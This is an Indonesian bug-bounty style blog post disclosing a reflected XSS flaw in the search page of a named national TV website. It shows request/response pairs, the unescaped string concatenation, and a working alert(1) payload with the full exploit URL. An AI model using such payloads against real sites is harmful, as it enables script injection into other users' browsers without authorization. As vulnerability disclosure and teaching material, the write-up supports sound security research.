NET.Z DOM Reflected XSS

Learn System Security - Salah satu situs televisi nasional Netmediatama yang memiliki alamat situs https://netz.id terdapat Bug Reflected XSS.


Kemarin saya buka buka situs https://netz.id, dan tertarik pada form search.
Lalu saya coba search pada situs tersebut.

Request: https://netz.id/search?s=hello
Response:
data = "s=hello&channel=" + channel + "&interval=" + interval + data;

Saya coba untuk memasukkan karakter petik dua,
Request: https://netz.id/search?s=hello"
Response:
data = "s=hello"&channel=" + channel + "&interval=" + interval + data;

Tidak ada filter sama sekali pada baris kode itu, dan saya menggunakan Payloads dibawah ini untuk mendapatkan XSS pada halaman itu.

Payloads: hello";}alert(1);function x(){//
Request: https://netz.id/search?s=hello";}alert(1);function x(){//
Response:
data = "s=hello";}alert(1);function x(){//&channel=" + channel + "&interval=" + interval + data;

Screenshot:

Sekian, happy bug hunting guys.

0 comments